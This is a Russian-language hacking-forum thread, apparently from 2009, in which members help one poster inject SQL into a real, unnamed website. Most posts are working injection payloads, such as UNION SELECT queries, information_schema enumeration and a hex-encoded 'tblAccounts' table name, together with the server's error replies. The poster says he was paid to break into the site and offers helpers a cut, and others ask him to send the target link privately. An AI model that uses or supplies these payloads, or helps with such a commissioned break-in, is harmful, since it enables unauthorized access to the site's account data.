 |
|
20.01.2009, 18:04
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
2z00MAN
попробуй так -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+limit+1,1+--+
тоже нет результатов((
2big_BRAT
-1+union+select%201,2,3,4,5,6,7,concat_ws(0x3a,tabl e_schema,table_name,column_name%20),9%20from%20inf ormation_schema.columns%20where%20column_name%20li ke%200x70617373
тоже пусто((( |
|
|
20.01.2009, 18:19
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами:
10200612
Репутация:
168
|
|
то что я показал это пример, и на твоём конечно может не сработать, лучше брось ссылку, так будет быстрее и нагляднее
|
|
|
|
20.01.2009, 18:23
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
С нами:
9121266
Репутация:
13
|
|
R1dex
таблицы я уже вывел
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name='tblAccounts')--
Incorrect syntax near '''.
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name=0x74626C4163636F756E7473)--
An expression of non-boolean type specified in a context where a condition is expected, near ')'.
|
|
|
|
20.01.2009, 18:29
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
покажи ссыль, мне кажется у тебя так с синтаксисом что-то не то получается...
|
|
|
|
20.01.2009, 18:34
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
С нами:
9121266
Репутация:
13
|
|
без ссылки никак?
мне просто этот сайт взломать заказали
а я первый раз с такой хней встречаюсь, до этого сайты c mssql уже ломал
так что с синтаксисом все ok 
P.S: кто поможет, % получит! ) |
|
|
|
20.01.2009, 18:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
перед or поставь '
|
|
|
|
20.01.2009, 18:43
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
С нами:
9121266
Репутация:
13
|
|
ты мне? где ты в моем запросе or видел? )
|
|
|
|
20.01.2009, 18:44
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema. columns+where+table_name=0x74626C4163636F756E7473)--
Он про это.
|
|
|
|
20.01.2009, 18:48
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
С нами:
9121266
Репутация:
13
|
|
Не надо из меня уж совсем то дурака делать, я же говорю ломал уже базы mssql
пробывал я все это уже
1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema.columns+where+table_name='tblAccounts')--
Incorrect syntax near '''.
1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)--
Incorrect syntax near '''.
|
|
|
|
20.01.2009, 18:56
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Не надо из меня уж совсем то дурака делать, я же говорю ломал уже базы mssql
Мы по твоему кто? Экстрасенсы? Мы не можем знать, делал ты так или нет. Если бы кинул ссылку - все было бы гораздо проще.
А то знаешь, как бывает... Помогаешь человеку сделать вывод таблиц из information_schema, и после долгих дискуссий он тебе кидает в личку ссылку, смотришь version()...
ЗЫ: Кинь ссылку в личку.
Последний раз редактировалось R1dex; 20.01.2009 в 18:59..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
